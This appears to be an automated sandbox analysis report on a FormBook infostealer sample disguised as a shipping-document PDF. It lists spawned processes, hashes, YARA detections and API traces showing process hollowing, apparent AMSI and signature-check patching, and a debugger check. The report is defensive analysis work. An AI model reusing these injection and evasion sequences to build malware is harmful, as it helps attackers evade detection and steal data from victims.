                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\dxobknwL.pif
                                                                                        Imagebase:0x400000
                                                                                        File size:175'800 bytes
                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:05:52:38
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        Target ID:16
                                                                                        Start time:05:52:40
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\proquota.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:39'424 bytes
                                                                                        MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:05:52:49
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        Target ID:18
                                                                                        Start time:05:52:52
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\proquota.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:39'424 bytes
                                                                                        MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:05:52:59
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe"
                                                                                        Imagebase:0x650000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        Target ID:20
                                                                                        Start time:05:53:12
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:15.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:10%
                                                                                          Total number of Nodes:300
                                                                                          Total number of Limit Nodes:20

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                            • Part of subcall function 029485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          • GetThreadContext.KERNEL32(000005A0,02991420,ScanString,029913A4,0294A77C,UacInitialize,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,UacInitialize,029913A4), ref: 02949442
                                                                                            • Part of subcall function 02948254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                            • Part of subcall function 029484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                            • Part of subcall function 029479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          • SetThreadContext.KERNEL32(000005A0,02991420,ScanBuffer,029913A4,0294A77C,ScanString,029913A4,0294A77C,Initialize,029913A4,0294A77C,0000088C,003E9FF8,029914F8,00000004,029914FC), ref: 0294A157
                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005A0,00000000,000005A0,02991420,ScanBuffer,029913A4,0294A77C,ScanString,029913A4,0294A77C,Initialize,029913A4,0294A77C,0000088C,003E9FF8,029914F8), ref: 0294A164
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 1022112746-51457883
                                                                                          • Opcode ID: 57b31183b2fa3ca47289ea445b260ecbd40b0b74f30c17078d091db7a3cd1acc
                                                                                          • Instruction ID: 34a0587d7af21cad4efde9af0ec7957f115a1d298cae1f28246d1fc78bdc184a
                                                                                          • Opcode Fuzzy Hash: 57b31183b2fa3ca47289ea445b260ecbd40b0b74f30c17078d091db7a3cd1acc
                                                                                          • Instruction Fuzzy Hash: 9CE20A75A501199BDB22FBA4CCA0EDE77FABFC9310F1251A1E009AB354DE30AE458F51

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 7653 2948bae-2948bb3 7655 2948bb8-2948bbd 7653->7655 7655->7655 7656 2948bbf-2948ca6 call 293493c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7655->7656 7687 294a6f7-294a761 call 29344d0 * 2 call 2934c0c call 29344d0 call 29344ac call 29344d0 * 2 7656->7687 7688 2948cac-2948d87 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7656->7688 7688->7687 7732 2948d8d-29490b5 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29330d4 * 2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934d8c call 2934d9c call 29485dc 7688->7732 7841 29490b7-2949123 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7732->7841 7842 2949128-2949449 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932ee0 call 2932f08 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 
29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 GetThreadContext 7732->7842 7841->7842 7842->7687 7950 294944f-29496b2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948254 7842->7950 8023 29499bf-2949a2b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 7950->8023 8024 29496b8-2949821 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29484c4 7950->8024 8051 2949a30-2949bb0 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 8023->8051 8114 2949823-2949849 call 29479b4 8024->8114 8115 294984b-29498b7 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 8024->8115 8051->7687 8155 2949bb6-2949caf call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2948ac0 8051->8155 8123 29498bc-29499bd call 293480c call 293494c call 29346a4 call 2934798 call 
293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29479b4 8114->8123 8115->8123 8123->8051 8206 2949cb1-2949cfe call 29489b8 call 29489ac 8155->8206 8207 2949d03-294a6f2 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947d00 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 SetThreadContext NtResumeThread call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2932c2c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29487a0 * 3 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29487a0 * 2 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 * 5 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 293480c 
call 293494c call 2934798 call 293494c call 29487a0 call 293480c call 293494c call 2934798 call 293494c call 29487a0 call 2947ed4 call 29487a0 * 2 8155->8207 8206->8207 8207->7687
                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                            • Part of subcall function 029485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          • GetThreadContext.KERNEL32(000005A0,02991420,ScanString,029913A4,0294A77C,UacInitialize,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,UacInitialize,029913A4), ref: 02949442
                                                                                            • Part of subcall function 02948254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                            • Part of subcall function 029484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                            • Part of subcall function 029479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 4113022151-51457883
                                                                                          • Opcode ID: 923a42a1b81a6c922ae559ca9bee369c6614aa3d46591d7a5252ff2aef2af35f
                                                                                          • Instruction ID: 8290e8030a493ae4962bd96dbe9b3c26a4c4a3306177a9d5a109b0d61da9e323
                                                                                          • Opcode Fuzzy Hash: 923a42a1b81a6c922ae559ca9bee369c6614aa3d46591d7a5252ff2aef2af35f
                                                                                          • Instruction Fuzzy Hash: 8DE20975A501199BDB22FBA4DCA0EDE73FABFC9310F1251A1E009AB354DE30AE458F51

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 8510 2935a78-2935ab9 GetModuleFileNameA RegOpenKeyExA 8511 2935afb-2935b3e call 29358b4 RegQueryValueExA 8510->8511 8512 2935abb-2935ad7 RegOpenKeyExA 8510->8512 8517 2935b62-2935b7c RegCloseKey 8511->8517 8518 2935b40-2935b5c RegQueryValueExA 8511->8518 8512->8511 8513 2935ad9-2935af5 RegOpenKeyExA 8512->8513 8513->8511 8516 2935b84-2935bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8516 8519 2935bbb-2935bbf 8516->8519 8520 2935c9e-2935ca5 8516->8520 8518->8517 8521 2935b5e 8518->8521 8523 2935bc1-2935bc5 8519->8523 8524 2935bcb-2935be1 lstrlenA 8519->8524 8521->8517 8523->8520 8523->8524 8525 2935be4-2935be7 8524->8525 8526 2935bf3-2935bfb 8525->8526 8527 2935be9-2935bf1 8525->8527 8526->8520 8529 2935c01-2935c06 8526->8529 8527->8526 8528 2935be3 8527->8528 8528->8525 8530 2935c30-2935c32 8529->8530 8531 2935c08-2935c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8520 8532 2935c34-2935c38 8530->8532 8531->8530 8532->8520 8533 2935c3a-2935c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8520 8534 2935c6c-2935c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8520
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295D790), ref: 02935A94
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AB2
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AD0
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
                                                                                          • RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
                                                                                          • RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77
                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1759228003-2375825460
                                                                                          • Opcode ID: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
                                                                                          • Instruction ID: 498be6e93397c0fa0d6913514c52d0909adc4e4d6f1cfd776176f0bb4df0c8a9
                                                                                          • Opcode Fuzzy Hash: dfddfb0743204c0e9a581eaed4191ba18828b5329c4d0ebd1f0647223fb889e7
                                                                                          • Instruction Fuzzy Hash: 32519771A4024C7EFB26D6E4CC46FEF77BDAB4C744F8101A5AA04E61C1D7749A448F60

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 10523 29487a0-29487c5 LoadLibraryW 10524 29487c7-29487df GetProcAddress 10523->10524 10525 294880f-2948815 10523->10525 10526 2948804-294880a FreeLibrary 10524->10526 10527 29487e1-2948800 call 2947d00 10524->10527 10526->10525 10527->10526 10530 2948802 10527->10530 10530->10526
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                          • API String ID: 1002360270-4067648912
                                                                                          • Opcode ID: eda7f3d62016ae7cf1eb094430a9c93f3dfed677ca27b323fc4e5dbfc1c7d5fa
                                                                                          • Instruction ID: ff426b66d5f2e177c514203d47f31597dad1fc33b5970e133187be832897bff5
                                                                                          • Opcode Fuzzy Hash: eda7f3d62016ae7cf1eb094430a9c93f3dfed677ca27b323fc4e5dbfc1c7d5fa
                                                                                          • Instruction Fuzzy Hash: 8CF04F71A89215FEEB119A6CAC46FB673BCB78537EF00096AF11C87680CB7058508B50

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 10540 294ebf0-294ec0a GetModuleHandleW 10541 294ec36-294ec3e 10540->10541 10542 294ec0c-294ec1e GetProcAddress 10540->10542 10542->10541 10543 294ec20-294ec30 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 294ec32 10543->10544 10544->10541
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 0294EC00
                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294EC12
                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294EC29
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
